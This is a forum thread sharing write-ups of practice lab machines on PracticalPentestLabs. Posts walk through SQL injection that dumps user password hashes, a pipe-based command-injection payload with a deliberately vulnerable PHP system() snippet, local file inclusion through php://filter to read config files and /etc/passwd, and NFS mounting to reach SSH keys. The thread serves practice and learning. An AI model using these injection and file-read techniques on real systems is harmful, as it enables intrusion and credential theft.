PracticalPentestLabs.com boxes writeups

exploit
writing
tutorial
hacking

(h4x0r) #1

Ok guys, I just changed the post title so we can have writeups for boxes inside that PracticalPentestLabs.com lab here :slight_smile:

Writeup structure:

HOSTNAME: … / IP: …
[spoiler] writeup_text [/spoiler]

Cheers !


#2

Never heard about it before. Seems quite new though and there is no about page at least none I could find at first sight. Might check it out when I have some spare time. So most likely not before mid August…


(h4x0r) #3

Much appreciated Mr Rick ! :slight_smile:


(CeCu) #4

I never heard it. Thanks a lot :slight_smile:


(h4x0r) #5

No problem @cecu, if you successfully PWN “HIGINI” give us some hints … it’s a pain !


(exploit) #6

Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but i don’t know what to do with it, nothing to read :smiley:


(h4x0r) #7

Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet

We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice :slightly_smiling_face:

— PracticalPentestLabs (@ppentestlabs) June 10, 2017
Can you write a small walk-through on how you did "HIGINI" ?

(DamaneDz) #9

HOSTNAME:C3PO
IP:10.0.1.6

I Found a SQLi in the Search Box

http://10.0.1.6/inc/search.php?query=xxx

By adding the single quotes you’ll get the Error message

I used SQLMap For Quick and Fast injection

as you see 3 types of injection …

Anyway

    select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:

[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The Only user Have admin privileges is admin himself :stuck_out_tongue:

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

go to this option

and as we know :stuck_out_tongue: The ping option use “system” function or “exec” or … so its clear that this box is vulnerable

Lemme check if its work first let ping the local ip address 127.0.0.1

Okay Cool :smiley:

To Run many functions you have to use | as separator between them

The PHP code Must be like that

<?php echo system("ping {$_GET['host']}"); ?>

So Let’s Try to send this Request

127.0.0.1|uname -a

Works Fine :smiley:

Whatever …

I Tried to upload a PHP Shell using “wget” but nothing …
I Read some PHP Files using “cat” command

That lead me to the config file named “base.php”

// .... PHP code
    $mysqlServer = 'localhost';
    $mysqlUser = 'vuln';
    $mysqlPassword = 'vuln';
    $mysqlName = 'vuln';
// .... PHP code

… To Be Continued


(h4x0r) #10

Awesome, thank you guys. Looking forward for more :slight_smile:


(DamaneDz) #11

HOSTNAME:TADDEO
IP:10.0.3.10

Let’s add “name” as a parameter to our request

Nothing shown ! let’s add phpinfo.php

Looks Like (LFI) Local File Include …

Let’s Read config.php file via PHP Filter

php://filter/convert.base64-encode/resource=config.php

We’ll get base64 code

<?php
define( 'DB_NAME', 'test' );

/** MySQL database username */
define( 'DB_USER', 'taddeo' );

/** MySQL database password */
define( 'DB_PASSWORD', '[email protected]' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

?>

This is The Code After Decoding …

Now Let’s Read /etc/passwd FILE

view-source:http://10.0.3.10/file.php?name=/etc/passwd

I’m Trying To upload a PHP Shell

So i’ll update this post if there is anything important or i’ll try to solve another challenge !


(andmuchmore) #12

HOSTNAME:TADDEO
IP:10.0.3.10

Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root

I did a quick search for the flag but didnt have any luck.

Any ideas?


(andmuchmore) #13

HOSTNAME: RASIM
IP: 10.0.3.11

Quick nmap scan

Nmap scan report for 10.0.3.11

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs

I tried to mount the nfs locally

mount 10.0.3.11:/ /test/

After a bit of digging around I found that /home/rasim/ had ssh keys in there.

Haven’t attemped to replace them yet but I am guess that should give us ssh access to the box.


(Mosa Tladi) #14

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell wont connect back or is this part of the challenge?

Thanks


(h4x0r) #15

Good job on TADDEO and RASIM I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host, I think you should check back when the hosts are reverted :slight_smile:

10.0.1.6

Hi,

Should I not be able to ping my attack pc?

I am trying to get a shell but seeing that I am unable to even ping
my PC the shell wont connect back or is this part of the challenge?

Thanks

I think it’s part of the challenge, I was able to bypass that though :wink:


(DamaneDz) #16

There is no hints in the challenges so I thought I have only to exploit them
anyway I solved the first part and you can solve the second :smiley:


(andmuchmore) #17

Any hints on how you got root on C3PO?

I have have shell and I thought the overlayfs exploit might I couldn’t seem to get it to work. I also tried a few others and they just seemed to crash the server :disappointed:


#18

@pry0cc @oaktree: I believe this post needs to resume on IRC at this point.


(h4x0r) #19

Why @calchemist ? is there a limit on how much replies per post ?


#20

@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It’d be much more convenient if you just hang out on IRC and at the same you won’t be shading other posts.


(Command-Line Ninja) #21

I agree with @calchemist. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.

If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.